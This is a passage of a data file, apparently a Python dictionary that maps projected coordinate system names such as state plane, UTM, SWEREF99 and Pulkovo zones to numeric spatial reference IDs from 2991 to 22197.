'NAD_1983_Oregon_Statewide_Lambert': 2991, 'NAD_1983_Oregon_Statewide_Lambert_Feet_Intl': 2992, 'NAD_1983_HARN_Oregon_Statewide_Lambert': 2993, 'NAD_1983_HARN_Oregon_Statewide_Lambert_Feet_Intl': 2994, 'IGN53_Mare_UTM_58S': 2995, 'ST84_Ile_des_Pins_UTM_58S': 2996, 'ST71_Belep_UTM_58S': 2997, 'NEA74_Noumea_UTM_58S': 2998, 'Grand_Comoros_UTM_38S': 2999, 'Gunung_Segara_NEIEZ': 3000, 'Batavia_NEIEZ': 3001, 'Makassar_NEIEZ': 3002, 'Monte_Mario_Italy_1': 3003, 'Monte_Mario_Italy_2': 3004, 'NAD_1983_BC_Environment_Albers': 3005, 'SWEREF99_TM': 3006, 'SWEREF99_12_00': 3007, 'SWEREF99_13_30': 3008, 'SWEREF99_15_00': 3009, 'SWEREF99_16_30': 3010, 'SWEREF99_18_00': 3011, 'SWEREF99_14_15': 3012, 'SWEREF99_15_45': 3013, 'SWEREF99_17_15': 3014, 'SWEREF99_18_45': 3015, 'SWEREF99_20_15': 3016, 'SWEREF99_21_45': 3017, 'SWEREF99_23_15': 3018, 'RT90_75_gon_V': 3019, 'RT90_5_gon_V': 3020, 'RT90_25_gon_V': 3021, 'RT90_0_gon': 3022, 'RT90_25_gon_O': 3023, 'RT90_5_gon_O': 3024, 'RT38_75_gon_V': 3025, 'RT38_5_gon_V': 3026, 'RT38_25_gon_V': 3027, 'RT38_0_gon': 3028, 'RT38_25_gon_O': 3029, 'RT38_5_gon_O': 3030, 'WGS_1984_Antarctic_Polar_Stereographic': 3031, 'WGS_1984_Australian_Antarctic_Polar_Stereographic': 3032, 'WGS_1984_Australian_Antarctic_Lambert': 3033, 'ETRS_1989_LCC': 3034, 'ETRS_1989_LAEA': 3035, 'Moznet_UTM_Zone_36S': 3036, 'Moznet_UTM_Zone_37S': 3037, 'Hjorsey_1955_UTM_Zone_26N': 3054, 'Hjorsey_1955_UTM_Zone_27N': 3055, 'Hjorsey_1955_UTM_Zone_28N': 3056, 'ISN_1993_Lambert_1993': 3057, 'Helle_1954_Jan_Mayen_Grid': 3058, 'LKS_1992_Latvia_TM': 3059, 'IGN72_Grande_Terre_UTM_58S': 3060, 'Porto_Santo_1995_UTM_Zone_28N': 3061, 'Azores_Oriental_1995_UTM_Zone_26N': 3062, 'Azores_Central_1995_UTM_Zone_26N': 3063, 'IGM_1995_UTM_Zone_32N': 3064, 'IGM_1995_UTM_Zone_33N': 3065, 'ED_1950_Jordan_TM': 3066, 'EUREF_FIN_TM35FIN': 3067, 'DHDN_Soldner_Berlin': 3068, 'NAD_1927_Wisconsin_TM': 3069, 'NAD_1983_Wisconsin_TM': 3070, 'NAD_1983_HARN_Wisconsin_TM': 3071, 'NAD_1983_Maine_2000_East_Zone': 3072, 'NAD_1983_Maine_2000_Central_Zone': 3073, 'NAD_1983_Maine_2000_West_Zone': 3074, 'NAD_1983_HARN_Maine_2000_East_Zone': 3075, 'NAD_1983_HARN_Maine_2000_Central_Zone': 3076, 'NAD_1983_HARN_Maine_2000_West_Zone': 3077, 'NAD_1983_Michigan_GeoRef_Meters': 3078, 'NAD_1983_HARN_Michigan_GeoRef_Meters': 3079, 'NAD_1927_Texas_Statewide_Mapping_System': 3080, 'NAD_1983_Texas_Statewide_Mapping_System': 3081, 'NAD_1983_Texas_Centric_Mapping_System_Lambert': 3082, 'NAD_1983_Texas_Centric_Mapping_System_Albers': 3083, 'NAD_1983_HARN_Texas_Centric_Mapping_System_Lambert': 3084, 'NAD_1983_HARN_Texas_Centric_Mapping_System_Albers': 3085, 'NAD_1983_Florida_GDL_Albers': 3086, 'NAD_1983_HARN_Florida_GDL_Albers': 3087, 'NAD_1983_StatePlane_Kentucky_FIPS_1600': 3088, 'NAD_1983_StatePlane_Kentucky_FIPS_1600_Feet': 3089, 'NAD_1983_HARN_StatePlane_Kentucky_FIPS_1600': 3090, 'NAD_1983_HARN_StatePlane_Kentucky_FIPS_1600_Feet': 3091, 'Tokyo_UTM_Zone_51N': 3092, 'Tokyo_UTM_Zone_52N': 3093, 'Tokyo_UTM_Zone_53N': 3094, 'Tokyo_UTM_Zone_54N': 3095, 'Tokyo_UTM_Zone_55N': 3096, 'JGD_2000_UTM_Zone_51N': 3097, 'JGD_2000_UTM_Zone_52N': 3098, 'JGD_2000_UTM_Zone_53N': 3099, 'JGD_2000_UTM_Zone_54N': 3100, 'JGD_2000_UTM_Zone_55N': 3101, 'Samoa_1962_Samoa_Lambert': 3102, 'Gulshan_303_Bangladesh_TM': 3106, 'GDA_1994_South_Australia_Lambert': 3107, 'ETRS_1989_Guernsey_Grid': 3108, 'ETRS_1989_Jersey_Transverse_Mercator': 3109, 'AGD_1966_VICGRID': 3110, 'GDA_1994_VICGRID94': 3111, 'GDA_1994_Geoscience_Australia_Lambert': 3112, 'GDA_1994_BCSG02': 3113, 'MAGNA_Colombia_Oeste_Oeste': 3114, 'MAGNA_Colombia_Oeste': 3115, 'MAGNA_Colombia_Bogota': 3116, 'MAGNA_Colombia_Este': 3117, 'MAGNA_Colombia_Este_Este': 3118, 'Douala_1948_AEF_West': 3119, 'Pulkovo_1942_Adj_1958_Poland_Zone_I': 3120, 'Philippines_Zone_I': 3121, 'Philippines_Zone_II': 3122, 'Philippines_Zone_III': 3123, 'Philippines_Zone_IV': 3124, 'Philippines_Zone_V': 3125, 'ETRS_1989_ETRS-GK19FIN': 3126, 'ETRS_1989_ETRS-GK20FIN': 3127, 'ETRS_1989_ETRS-GK21FIN': 3128, 'ETRS_1989_ETRS-GK22FIN': 3129, 'ETRS_1989_ETRS-GK23FIN': 3130, 'ETRS_1989_ETRS-GK24FIN': 3131, 'ETRS_1989_ETRS-GK25FIN': 3132, 'ETRS_1989_ETRS-GK26FIN': 3133, 'ETRS_1989_ETRS-GK27FIN': 3134, 'ETRS_1989_ETRS-GK28FIN': 3135, 'ETRS_1989_ETRS-GK29FIN': 3136, 'ETRS_1989_ETRS-GK30FIN': 3137, 'ETRS_1989_ETRS-GK31FIN': 3138, 'Fiji_1956_UTM_Zone_60S': 3141, 'Fiji_1956_UTM_Zone_1S': 3142, 'Indian_1960_UTM_Zone_48N': 3148, 'Indian_1960_UTM_Zone_49N': 3149, 'NAD_1983_CSRS_BC_Environment_Albers': 3153, 'NAD_1983_CSRS_UTM_Zone_7N': 3154, 'NAD_1983_CSRS_UTM_Zone_8N': 3155, 'NAD_1983_CSRS_UTM_Zone_9N': 3156, 'NAD_1983_CSRS_UTM_Zone_10N': 3157, 'NAD_1983_CSRS_UTM_Zone_14N': 3158, 'NAD_1983_CSRS_UTM_Zone_15N': 3159, 'NAD_1983_CSRS_UTM_Zone_16N': 3160, 'NAD_1983_Ontario_MNR_Lambert': 3161, 'NAD_1983_CSRS_Ontario_MNR_Lambert': 3162, 'RGNC_1991_93_Lambert_New_Caledonia': 3163, 'ST87_Ouvea_UTM_58S': 3164, 'NEA74_Noumea_Lambert': 3165, 'NEA74_Noumea_Lambert_2': 3166, 'RGNC_1991-93_UTM_Zone_57S': 3169, 'RGNC_1991-93_UTM_Zone_58S': 3170, 'RGNC_1991-93_UTM_Zone_59S': 3171, 'IGN53_Mare_UTM_Zone_59S': 3172, 'NAD_1983_Great_Lakes_Basin_Albers': 3174, 'NAD_1983_Great_Lakes_and_St_Lawrence_Albers': 3175, 'Indian_1960_TM_106NE': 3176, 'LGD2006_Libya_TM': 3177, 'Greenland_1996_UTM_Zone_18N': 3178, 'Greenland_1996_UTM_Zone_19N': 3179, 'Greenland_1996_UTM_Zone_20N': 3180, 'Greenland_1996_UTM_Zone_21N': 3181, 'Greenland_1996_UTM_Zone_22N': 3182, 'Greenland_1996_UTM_Zone_23N': 3183, 'Greenland_1996_UTM_Zone_24N': 3184, 'Greenland_1996_UTM_Zone_25N': 3185, 'Greenland_1996_UTM_Zone_26N': 3186, 'Greenland_1996_UTM_Zone_27N': 3187, 'Greenland_1996_UTM_Zone_28N': 3188, 'Greenland_1996_UTM_Zone_29N': 3189, 'LGD2006_Libya_TM_Zone_5': 3190, 'LGD2006_Libya_TM_Zone_6': 3191, 'LGD2006_Libya_TM_Zone_7': 3192, 'LGD2006_Libya_TM_Zone_8': 3193, 'LGD2006_Libya_TM_Zone_9': 3194, 'LGD2006_Libya_TM_Zone_10': 3195, 'LGD2006_Libya_TM_Zone_11': 3196, 'LGD2006_Libya_TM_Zone_12': 3197, 'LGD2006_Libya_TM_Zone_13': 3198, 'LGD2006_UTM_Zone_32N': 3199, 'FD_1958_Iraq': 3200, 'LGD2006_UTM_Zone_33N': 3201, 'LGD2006_UTM_Zone_34N': 3202, 'LGD2006_UTM_Zone_35N': 3203, 'WGS_1984_USGS_Transantarctic_Mountains': 3294, 'RGPF_UTM_Zone_5S': 3296, 'RGPF_UTM_Zone_6S': 3297, 'RGPF_UTM_Zone_7S': 3298, 'RGPF_UTM_Zone_8S': 3299, 'Estonian_Coordinate_System_of_1992': 3300, 'Estonia_1997_Estonia_National_Grid': 3301, 'IGN63_Hiva_Oa_UTM_Zone_7S': 3302, 'Fatu_Iva_1972_UTM_Zone_7S': 3303, 'Tahiti_1979_UTM_Zone_6S': 3304, 'Moorea_1987_UTM_Zone_6S': 3305, 'Maupiti_1983_UTM_Zone_5S': 3306, 'Nakhl-e_Ghanem_UTM_Zone_39N': 3307, 'GDA_1994_NSW_lambert': 3308, 'NAD_1927_California_Teale_Albers': 3309, 'NAD_1983_California_Teale_Albers': 3310, 'NAD_1983_HARN_California_Teale_Albers': 3311, 'CSG_1967_UTM_Zone_21N': 3312, 'RGFG_1995_UTM_Zone_21N': 3313, 'Katanga_1955_Katanga_Lambert': 3314, 'Katanga_1955_Katanga_TM': 3315, 'Kasai_1953_Congo_TM_Zone_22': 3316, 'Kasai_1953_Congo_TM_Zone_24': 3317, 'IGC_1962_Congo_TM_Zone_12': 3318, 'IGC_1962_Congo_TM_Zone_14': 3319, 'IGC_1962_Congo_TM_Zone_16': 3320, 'IGC_1962_Congo_TM_Zone_18': 3321, 'IGC_1962_Congo_TM_Zone_20': 3322, 'IGC_1962_Congo_TM_Zone_22': 3323, 'IGC_1962_Congo_TM_Zone_24': 3324, 'IGC_1962_Congo_TM_Zone_26': 3325, 'IGC_1962_Congo_TM_Zone_28': 3326, 'IGC_1962_Congo_TM_Zone_30': 3327, 'Pulkovo_1942_Adj_1958_GUGiK-80': 3328, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_5': 3329, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_6': 3330, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_7': 3331, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_8': 3332, 'Pulkovo_1942_Adj_1958_GK_Zone_3': 3333, 'Pulkovo_1942_Adj_1958_GK_Zone_4': 3334, 'Pulkovo_1942_Adj_1958_GK_Zone_5': 3335, 'Kerguelen_Island_1949_UTM_42S': 3336, 'Le_Pouce_1934_Mauritius_Grid': 3337, 'NAD_1983_Alaska_Albers': 3338, 'IGCB_1955_Congo_TM_Zone_12': 3339, 'IGCB_1955_Congo_TM_Zone_14': 3340, 'IGCB_1955_Congo_TM_Zone_16': 3341, 'IGCB_1955_UTM_Zone_33S': 3342, 'Mauritania_1999_UTM_Zone_28N': 3343, 'Mauritania_1999_UTM_Zone_29N': 3344, 'Mauritania_1999_UTM_Zone_30N': 3345, 'LKS_1994_Lithuania_TM': 3346, 'NAD_1983_Statistics_Canada_Lambert': 3347, 'NAD_1983_CSRS_Statistics_Canada_Lambert': 3348, 'WGS_1984_PDC_Mercator': 3349, 'Pulkovo_1942_CS63_Zone_K0': 3350, 'Pulkovo_1942_CS63_Zone_K1': 3351, 'Pulkovo_1942_CS63_Zone_K2': 3352, 'Mhast_Onshore_UTM_Zone_32S': 3353, 'Mhast_Offshore_UTM_Zone_32S': 3354, 'Egypt_Gulf_of_Suez_S-650_TL_Red_Belt': 3355, 'Grand_Cayman_1959_UTM_Zone_17N': 3356, 'Little_Cayman_1961_UTM_Zone_17N': 3357, 'NAD_1983_HARN_StatePlane_North_Carolina_FIPS_3200': 3358, 'NAD_1983_HARN_StatePlane_North_Carolina_FIPS_3200_Feet': 3359, 'NAD_1983_HARN_StatePlane_South_Carolina_FIPS_3900': 3360, 'NAD_1983_HARN_StatePlane_South_Carolina_FIPS_3900_Feet_Intl': 3361, 'NAD_1983_HARN_StatePlane_Pennsylvania_North_FIPS_3701': 3362, 'NAD_1983_HARN_StatePlane_Pennsylvania_North_FIPS_3701_Feet': 3363, 'NAD_1983_HARN_StatePlane_Pennsylvania_South_FIPS_3702': 3364, 'NAD_1983_HARN_StatePlane_Pennsylvania_South_FIPS_3702_Feet': 3365, 'Hong_Kong_1963_Grid_System': 3366, 'IGN_Astro_1960_UTM_Zone_28N': 3367, 'IGN_Astro_1960_UTM_Zone_29N': 3368, 'IGN_Astro_1960_UTM_Zone_30N': 3369, 'NAD_1927_UTM_Zone_59N': 3370, 'NAD_1927_UTM_Zone_60N': 3371, 'NAD_1983_UTM_Zone_59N': 3372, 'NAD_1983_UTM_Zone_60N': 3373, 'FD_1954_UTM_Zone_29N': 3374, 'GDM_2000_MRSO_Peninsular_Malaysia': 3375, 'GDM_2000_BRSO_East_Malaysia': 3376, 'GDM_2000_State_Cassini_Johor': 3377, 'GDM_2000_State_Cassini_Negeri_Sembilan_&_Melaka': 3378, 'GDM_2000_State_Cassini_Pahang': 3379, 'GDM_2000_State_Cassini_Selangor': 3380, 'GDM_2000_State_Cassini_Terengganu': 3381, 'GDM_2000_State_Cassini_Pulau_Pinang_&_Seberang_Perai': 3382, 'GDM_2000_State_Cassini_Perlis': 3383, 'GDM_2000_State_Cassini_Perak': 3384, 'GDM_2000_State_Cassini_Kelantan': 3385, 'KKJ_Finland_Zone_0': 3386, 'KKJ_Finland_Zone_5': 3387, 'Pulkovo_1942_Caspian_Sea_Mercator': 3388, 'Karbala_1979_Polservice_UTM_Zone_37N': 3391, 'Karbala_1979_Polservice_UTM_Zone_38N': 3392, 'Karbala_1979_Polservice_UTM_Zone_39N': 3393, 'Nahrwan_1934_Iraq_Zone': 3394, 'WGS_1984_World_Mercator': 3395, 'PD/83_GK_Zone_3': 3396, 'PD/83_GK_Zone_4': 3397, 'RD/83_GK_Zone_4': 3398, 'RD/83_GK_Zone_5': 3399, 'NAD_1983_10TM_AEP_Forest': 3400, 'NAD_1983_10TM_AEP_Resource': 3401, 'NAD_1983_CSRS_10TM_AEP_Forest': 3402, 'NAD_1983_CSRS_10TM_AEP_Resource': 3403, 'NAD_1983_HARN_StatePlane_North_Carolina_FIPS_3200_Feet': 3404, 'VN_2000_UTM_Zone_48N': 3405, 'VN_2000_UTM_Zone_49N': 3406, 'Hong_Kong_1963_Grid_System': 3407, 'NSIDC_EASE_Grid_North': 3408, 'NSIDC_EASE_Grid_South': 3409, 'NSIDC_EASE_Grid_Global': 3410, 'NSIDC_Sea_Ice_Polar_Stereographic_North': 3411, 'NSIDC_Sea_Ice_Polar_Stereographic_South': 3412, 'WGS_1984_NSIDC_Sea_Ice_Polar_Stereographic_North': 3413, 'SVY21_Singapore_TM': 3414, 'WGS_1972_BE_South_China_Sea_Lambert': 3415, 'ETRS_1989_Austria_Lambert': 3416, 'NAD_1983_StatePlane_Iowa_North_FIPS_1401_Feet': 3417, 'NAD_1983_StatePlane_Iowa_South_FIPS_1402_Feet': 3418, 'NAD_1983_StatePlane_Kansas_North_FIPS_1501_Feet': 3419, 'NAD_1983_StatePlane_Kansas_South_FIPS_1502_Feet': 3420, 'NAD_1983_StatePlane_Nevada_East_FIPS_2701_Feet': 3421, 'NAD_1983_StatePlane_Nevada_Central_FIPS_2702_Feet': 3422, 'NAD_1983_StatePlane_Nevada_West_FIPS_2703_Feet': 3423, 'NAD_1983_StatePlane_New_Jersey_FIPS_2900_Feet': 3424, 'NAD_1983_HARN_StatePlane_Iowa_North_FIPS_1401_Feet': 3425, 'NAD_1983_HARN_StatePlane_Iowa_South_FIPS_1402_Feet': 3426, 'NAD_1983_HARN_StatePlane_Kansas_North_FIPS_1501_Feet': 3427, 'NAD_1983_HARN_StatePlane_Kansas_South_FIPS_1502_Feet': 3428, 'NAD_1983_HARN_StatePlane_Nevada_East_FIPS_2701_Feet': 3429, 'NAD_1983_HARN_StatePlane_Nevada_Central_FIPS_2702_Feet': 3430, 'NAD_1983_HARN_StatePlane_Nevada_West_FIPS_2703_Feet': 3431, 'NAD_1983_HARN_StatePlane_New_Jersey_FIPS_2900_Feet': 3432, 'NAD_1983_StatePlane_Arkansas_North_FIPS_0301_Feet': 3433, 'NAD_1983_StatePlane_Arkansas_South_FIPS_0302_Feet': 3434, 'NAD_1983_StatePlane_Illinois_East_FIPS_1201_Feet': 3435, 'NAD_1983_StatePlane_Illinois_West_FIPS_1202_Feet': 3436, 'NAD_1983_StatePlane_New_Hampshire_FIPS_2800_Feet': 3437, 'NAD_1983_StatePlane_Rhode_Island_FIPS_3800_Feet': 3438, 'PDO_1993_UTM_Zone_39N': 3439, 'PDO_1993_UTM_Zone_40N': 3440, 'NAD_1983_HARN_StatePlane_Arkansas_North_FIPS_0301_Feet': 3441, 'NAD_1983_HARN_StatePlane_Arkansas_South_FIPS_0302_Feet': 3442, 'NAD_1983_HARN_StatePlane_Illinois_East_FIPS_1201_Feet': 3443, 'NAD_1983_HARN_StatePlane_Illinois_West_FIPS_1202_Feet': 3444, 'NAD_1983_HARN_StatePlane_New_Hampshire_FIPS_2800_Feet': 3445, 'NAD_1983_HARN_StatePlane_Rhode_Island_FIPS_3800_Feet': 3446, 'Belge_Lambert_2005': 3447, 'JAD_2001_Jamaica_Grid': 3448, 'JAD_2001_UTM_Zone_17N': 3449, 'JAD_2001_UTM_Zone_18N': 3450, 'NAD_1983_StatePlane_Louisiana_Offshore_FIPS_1703_Feet': 3453, 'NAD_1983_HARN_StatePlane_Louisiana_North_FIPS_1701_Feet': 3456, 'NAD_1983_HARN_StatePlane_Louisiana_South_FIPS_1702_Feet': 3457, 'NAD_1983_HARN_StatePlane_South_Dakota_North_FIPS_4001_Feet': 3458, 'NAD_1983_HARN_StatePlane_South_Dakota_South_FIPS_4002_Feet': 3459, 'Fiji_1986_Fiji_Map_Grid': 3460, 'Dabola_1981_UTM_Zone_28N': 3461, 'Dabola_1981_UTM_Zone_29N': 3462, 'NAD_1983_Maine_2000_Central_Zone': 3463, 'NAD_1983_HARN_Maine_2000_Central_Zone': 3464, 'NAD_1983_StatePlane_Utah_North_FIPS_4301_Feet': 3560, 'Old_Hawaiian_StatePlane_Hawaii_1_FIPS_5101': 3561, 'Old_Hawaiian_StatePlane_Hawaii_2_FIPS_5102': 3562, 'Old_Hawaiian_StatePlane_Hawaii_3_FIPS_5103': 3563, 'Old_Hawaiian_StatePlane_Hawaii_4_FIPS_5104': 3564, 'Old_Hawaiian_StatePlane_Hawaii_5_FIPS_5105': 3565, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302_Feet': 3566, 'NAD_1983_StatePlane_Utah_South_FIPS_4303_Feet': 3567, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301_Feet': 3568, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302_Feet': 3569, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303_Feet': 3570, 'WGS_1984_North_Pole_LAEA_Bering_Sea': 3571, 'WGS_1984_North_Pole_LAEA_Alaska': 3572, 'WGS_1984_North_Pole_LAEA_Canada': 3573, 'WGS_1984_North_Pole_LAEA_Atlantic': 3574, 'WGS_1984_North_Pole_LAEA_Europe': 3575, 'WGS_1984_North_Pole_LAEA_Russia': 3576, 'GDA_1994_Australia_Albers': 3577, 'NAD_1983_Yukon_Albers': 3578, 'NAD_1983_CSRS_Yukon_Albers': 3579, 'NAD_1983_Northwest_Territories_Lambert': 3580, 'NAD_1983_CSRS_Northwest_Territories_Lambert': 3581, 'Reunion_1947_TM_Reunion': 3727, 'NAD_1983_StatePlane_Ohio_North_FIPS_3401_Feet': 3734, 'NAD_1983_StatePlane_Ohio_South_FIPS_3402_Feet': 3735, 'NAD_1983_StatePlane_Wyoming_East_FIPS_4901_Feet': 3736, 'NAD_1983_StatePlane_Wyoming_East_Central_FIPS_4902_Feet': 3737, 'NAD_1983_StatePlane_Wyoming_West_Central_FIPS_4903_Feet': 3738, 'NAD_1983_StatePlane_Wyoming_West_FIPS_4904_Feet': 3739, 'NAD_1983_HARN_StatePlane_Ohio_North_FIPS_3401_Feet': 3753, 'NAD_1983_HARN_StatePlane_Ohio_South_FIPS_3402_Feet': 3754, 'NAD_1983_HARN_StatePlane_Wyoming_East_FIPS_4901_Feet': 3755, 'NAD_1983_HARN_StatePlane_Wyoming_East_Central_FIPS_4902_Feet': 3756, 'NAD_1983_HARN_StatePlane_Wyoming_West_Central_FIPS_4903_Feet': 3757, 'NAD_1983_HARN_StatePlane_Wyoming_West_FIPS_4904_Feet': 3758, 'NAD_1983_StatePlane_Hawaii_3_FIPS_5103_Feet': 3759, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103_Feet': 3760, 'NAD_1983_CSRS_UTM_Zone_22N': 3761, 'WGS_1984_South_Georgia_Lambert': 3762, 'ETRS_1989_Portugal_TM06': 3763, 'Puerto_Rico_UTM_Zone_20N': 3920, 'Puerto_Rico_StatePlane_Puerto_Rico_FIPS_5201': 3991, 'Puerto_Rico_StatePlane_Virgin_Islands_St_Croix_FIPS_5202': 3992, 'Pulkovo_1995_GK_Zone_2': 20002, 'Pulkovo_1995_GK_Zone_3': 20003, 'Pulkovo_1995_GK_Zone_4': 20004, 'Pulkovo_1995_GK_Zone_5': 20005, 'Pulkovo_1995_GK_Zone_6': 20006, 'Pulkovo_1995_GK_Zone_7': 20007, 'Pulkovo_1995_GK_Zone_8': 20008, 'Pulkovo_1995_GK_Zone_9': 20009, 'Pulkovo_1995_GK_Zone_10': 20010, 'Pulkovo_1995_GK_Zone_11': 20011, 'Pulkovo_1995_GK_Zone_12': 20012, 'Pulkovo_1995_GK_Zone_13': 20013, 'Pulkovo_1995_GK_Zone_14': 20014, 'Pulkovo_1995_GK_Zone_15': 20015, 'Pulkovo_1995_GK_Zone_16': 20016, 'Pulkovo_1995_GK_Zone_17': 20017, 'Pulkovo_1995_GK_Zone_18': 20018, 'Pulkovo_1995_GK_Zone_19': 20019, 'Pulkovo_1995_GK_Zone_20': 20020, 'Pulkovo_1995_GK_Zone_21': 20021, 'Pulkovo_1995_GK_Zone_22': 20022, 'Pulkovo_1995_GK_Zone_23': 20023, 'Pulkovo_1995_GK_Zone_24': 20024, 'Pulkovo_1995_GK_Zone_25': 20025, 'Pulkovo_1995_GK_Zone_26': 20026, 'Pulkovo_1995_GK_Zone_27': 20027, 'Pulkovo_1995_GK_Zone_28': 20028, 'Pulkovo_1995_GK_Zone_29': 20029, 'Pulkovo_1995_GK_Zone_30': 20030, 'Pulkovo_1995_GK_Zone_31': 20031, 'Pulkovo_1995_GK_Zone_32': 20032, 'Pulkovo_1995_GK_Zone_2N': 20062, 'Pulkovo_1995_GK_Zone_3N': 20063, 'Pulkovo_1995_GK_Zone_4N': 20064, 'Pulkovo_1995_GK_Zone_5N': 20065, 'Pulkovo_1995_GK_Zone_6N': 20066, 'Pulkovo_1995_GK_Zone_7N': 20067, 'Pulkovo_1995_GK_Zone_8N': 20068, 'Pulkovo_1995_GK_Zone_9N': 20069, 'Pulkovo_1995_GK_Zone_10N': 20070, 'Pulkovo_1995_GK_Zone_11N': 20071, 'Pulkovo_1995_GK_Zone_12N': 20072, 'Pulkovo_1995_GK_Zone_13N': 20073, 'Pulkovo_1995_GK_Zone_14N': 20074, 'Pulkovo_1995_GK_Zone_15N': 20075, 'Pulkovo_1995_GK_Zone_16N': 20076, 'Pulkovo_1995_GK_Zone_17N': 20077, 'Pulkovo_1995_GK_Zone_18N': 20078, 'Pulkovo_1995_GK_Zone_19N': 20079, 'Pulkovo_1995_GK_Zone_20N': 20080, 'Pulkovo_1995_GK_Zone_21N': 20081, 'Pulkovo_1995_GK_Zone_22N': 20082, 'Pulkovo_1995_GK_Zone_23N': 20083, 'Pulkovo_1995_GK_Zone_24N': 20084, 'Pulkovo_1995_GK_Zone_25N': 20085, 'Pulkovo_1995_GK_Zone_26N': 20086, 'Pulkovo_1995_GK_Zone_27N': 20087, 'Pulkovo_1995_GK_Zone_28N': 20088, 'Pulkovo_1995_GK_Zone_29N': 20089, 'Pulkovo_1995_GK_Zone_30N': 20090, 'Pulkovo_1995_GK_Zone_31N': 20091, 'Pulkovo_1995_GK_Zone_32N': 20092, 'Adindan_UTM_Zone_35N': 20135, 'Adindan_UTM_Zone_36N': 20136, 'Adindan_UTM_Zone_37N': 20137, 'Adindan_UTM_Zone_38N': 20138, 'AGD_1966_AMG_Zone_48': 20248, 'AGD_1966_AMG_Zone_49': 20249, 'AGD_1966_AMG_Zone_50': 20250, 'AGD_1966_AMG_Zone_51': 20251, 'AGD_1966_AMG_Zone_52': 20252, 'AGD_1966_AMG_Zone_53': 20253, 'AGD_1966_AMG_Zone_54': 20254, 'AGD_1966_AMG_Zone_55': 20255, 'AGD_1966_AMG_Zone_56': 20256, 'AGD_1966_AMG_Zone_57': 20257, 'AGD_1966_AMG_Zone_58': 20258, 'AGD_1984_AMG_Zone_48': 20348, 'AGD_1984_AMG_Zone_49': 20349, 'AGD_1984_AMG_Zone_50': 20350, 'AGD_1984_AMG_Zone_51': 20351, 'AGD_1984_AMG_Zone_52': 20352, 'AGD_1984_AMG_Zone_53': 20353, 'AGD_1984_AMG_Zone_54': 20354, 'AGD_1984_AMG_Zone_55': 20355, 'AGD_1984_AMG_Zone_56': 20356, 'AGD_1984_AMG_Zone_57': 20357, 'AGD_1984_AMG_Zone_58': 20358, 'Ain_el_Abd_UTM_Zone_36N': 20436, 'Ain_el_Abd_UTM_Zone_37N': 20437, 'Ain_el_Abd_UTM_Zone_38N': 20438, 'Ain_el_Abd_UTM_Zone_39N': 20439, 'Ain_el_Abd_UTM_Zone_40N': 20440, 'Bahrain_State_Grid': 20499, 'Afgooye_UTM_Zone_38N': 20538, 'Afgooye_UTM_Zone_39N': 20539, 'Portuguese_National_Grid': 20790, 'Aratu_UTM_Zone_22S': 20822, 'Aratu_UTM_Zone_23S': 20823, 'Aratu_UTM_Zone_24S': 20824, 'Arc_1950_UTM_Zone_34S': 20934, 'Arc_1950_UTM_Zone_35S': 20935, 'Arc_1950_UTM_Zone_36S': 20936, 'Arc_1960_UTM_Zone_35S': 21035, 'Arc_1960_UTM_Zone_36S': 21036, 'Arc_1960_UTM_Zone_37S': 21037, 'Arc_1960_UTM_Zone_35N': 21095, 'Arc_1960_UTM_Zone_36N': 21096, 'Arc_1960_UTM_Zone_37N': 21097, 'Batavia_UTM_Zone_48S': 21148, 'Batavia_UTM_Zone_49S': 21149, 'Batavia_UTM_Zone_50S': 21150, 'Barbados_1938_British_West_Indies_Grid': 21291, 'Barbados_1938_Barbados_Grid': 21292, 'Beijing_1954_GK_Zone_13': 21413, 'Beijing_1954_GK_Zone_14': 21414, 'Beijing_1954_GK_Zone_15': 21415, 'Beijing_1954_GK_Zone_16': 21416, 'Beijing_1954_GK_Zone_17': 21417, 'Beijing_1954_GK_Zone_18': 21418, 'Beijing_1954_GK_Zone_19': 21419, 'Beijing_1954_GK_Zone_20': 21420, 'Beijing_1954_GK_Zone_21': 21421, 'Beijing_1954_GK_Zone_22': 21422, 'Beijing_1954_GK_Zone_23': 21423, 'Beijing_1954_GK_Zone_13N': 21473, 'Beijing_1954_GK_Zone_14N': 21474, 'Beijing_1954_GK_Zone_15N': 21475, 'Beijing_1954_GK_Zone_16N': 21476, 'Beijing_1954_GK_Zone_17N': 21477, 'Beijing_1954_GK_Zone_18N': 21478, 'Beijing_1954_GK_Zone_19N': 21479, 'Beijing_1954_GK_Zone_20N': 21480, 'Beijing_1954_GK_Zone_21N': 21481, 'Beijing_1954_GK_Zone_22N': 21482, 'Beijing_1954_GK_Zone_23N': 21483, 'Belge_Lambert_1950': 21500, 'Bern_1898_Bern_LV03C': 21780, 'CH1903_LV03': 21781, 'Bogota_UTM_Zone_17N': 21817, 'Bogota_UTM_Zone_18N': 21818, 'Colombia_West_Zone': 21891, 'Colombia_Bogota_Zone': 21892, 'Colombia_East_Central_Zone': 21893, 'Colombia_East_Zone': 21894, 'Colombia_West_Zone': 21896, 'Colombia_Bogota_Zone': 21897, 'Colombia_East_Central_Zone': 21898, 'Colombia_East_Zone': 21899, 'Camacupa_UTM_Zone_32S': 22032, 'Camacupa_UTM_Zone_33S': 22033, 'Camacupa_TM_11_30_SE': 22091, 'Camacupa_TM_12_SE': 22092, 'POSGAR_1998_Argentina_Zone_1': 22171, 'POSGAR_1998_Argentina_Zone_2': 22172, 'POSGAR_1998_Argentina_Zone_3': 22173, 'POSGAR_1998_Argentina_Zone_4': 22174, 'POSGAR_1998_Argentina_Zone_5': 22175, 'POSGAR_1998_Argentina_Zone_6': 22176, 'POSGAR_1998_Argentina_Zone_7': 22177, 'POSGAR_1994_Argentina_Zone_1': 22181, 'POSGAR_1994_Argentina_Zone_2': 22182, 'POSGAR_1994_Argentina_Zone_3': 22183, 'POSGAR_1994_Argentina_Zone_4': 22184, 'POSGAR_1994_Argentina_Zone_5': 22185, 'POSGAR_1994_Argentina_Zone_6': 22186, 'POSGAR_1994_Argentina_Zone_7': 22187, 'Argentina_Zone_1': 22191, 'Argentina_Zone_2': 22192, 'Argentina_Zone_3': 22193, 'Argentina_Zone_4': 22194, 'Argentina_Zone_5': 22195, 'Argentina_Zone_6': 22196, 'Argentina_Zone_7': 22197, 